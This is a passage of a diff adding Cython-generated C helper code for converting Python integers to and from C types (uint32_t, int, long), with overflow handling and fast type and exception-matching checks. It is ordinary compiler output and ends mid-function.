(bits = 0; bits < (int) sizeof(uint32_t) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((uint32_t) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(uint32_t) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((uint32_t) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((uint32_t) 1) << (sizeof(uint32_t) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (uint32_t) -1; + } + } else { + uint32_t val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (uint32_t) -1; + val = __Pyx_PyInt_As_uint32_t(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to uint32_t"); + return (uint32_t) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to uint32_t"); + return (uint32_t) -1; +} + +/* CIntFromPy */ +static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(int) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(int, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (int) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 2 * PyLong_SHIFT)) { + return (int) (((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 3 * PyLong_SHIFT)) { + return (int) (((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 4 * PyLong_SHIFT)) { + return (int) (((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(int) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(int) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) ((((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) ((((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) ((((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(int) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + int val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (int) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (int) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (int) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (int) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(int) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(int) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((int) 1) << (sizeof(int) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (int) -1; + } + } else { + int val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (int) -1; + val = __Pyx_PyInt_As_int(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to int"); + return (int) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to int"); + return (int) -1; +} + +/* CIntToPy */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_int(int value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(int) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(int) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(int) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(int) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(int) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(int), + little, !is_unsigned); + } +} + +/* FormatTypeName */ +#if CYTHON_COMPILING_IN_LIMITED_API +static __Pyx_TypeName +__Pyx_PyType_GetName(PyTypeObject* tp) +{ + PyObject *name = __Pyx_PyObject_GetAttrStr((PyObject *)tp, + __pyx_n_s_name); + if (unlikely(name == NULL) || unlikely(!PyUnicode_Check(name))) { + PyErr_Clear(); + Py_XSETREF(name, __Pyx_NewRef(__pyx_n_s__7)); + } + return name; +} +#endif + +/* CIntToPy */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(long) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(long) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(long) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(long), + little, !is_unsigned); + } +} + +/* CIntFromPy */ +static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(long) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(long, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (long) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 2 * PyLong_SHIFT)) { + return (long) (((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 3 * PyLong_SHIFT)) { + return (long) (((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 4 * PyLong_SHIFT)) { + return (long) (((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(long) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(long) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) ((((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) ((((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) ((((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(long) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + long val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (long) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (long) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (long) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (long) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(long) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(long) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((long) 1) << (sizeof(long) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (long) -1; + } + } else { + long val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (long) -1; + val = __Pyx_PyInt_As_long(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to long"); + return (long) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to long"); + return (long) -1; +} + +/* FastTypeChecks */ +#if CYTHON_COMPILING_IN_CPYTHON +static int __Pyx_InBases(PyTypeObject *a, PyTypeObject *b) { + while (a) { + a = __Pyx_PyType_GetSlot(a, tp_base, PyTypeObject*); + if (a == b) + return 1; + } + return b == &PyBaseObject_Type; +} +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (a == b) return 1; + mro = a->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + if (PyTuple_GET_ITEM(mro, i) == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(a, b); +} +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (cls == a || cls == b) return 1; + mro = cls->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + PyObject *base = PyTuple_GET_ITEM(mro, i); + if (base == (PyObject *)a || base == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(cls, a) || __Pyx_InBases(cls, b); +} +#if PY_MAJOR_VERSION == 2 +static int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject* exc_type2) { + PyObject *exception, *value, *tb; + int res; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&exception, &value, &tb); + res = exc_type1 ? PyObject_IsSubclass(err, exc_type1) : 0; + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + if (!res) { + res = PyObject_IsSubclass(err, exc_type2); + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + } + __Pyx_ErrRestore(exception, value, tb); + return res; +} +#else +static CYTHON_INLINE int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject *exc_type2) { + if (exc_type1) { + return __Pyx_IsAnySubtype2((PyTypeObject*)err, (PyTypeObject*)exc_type1, (PyTypeObject*)exc_type2); + } else { + return __Pyx_IsSubtype((PyTypeObject*)err, (PyTypeObject*)exc_type2); + } +} +#endif +static int __Pyx_PyErr_GivenExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + assert(PyExceptionClass_Check(exc_type)); + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; i '9'); + break; + } + if (rt_from_call[i] != ctversion[i]) { + same = 0; + break; + } + } + if (!same) { + char 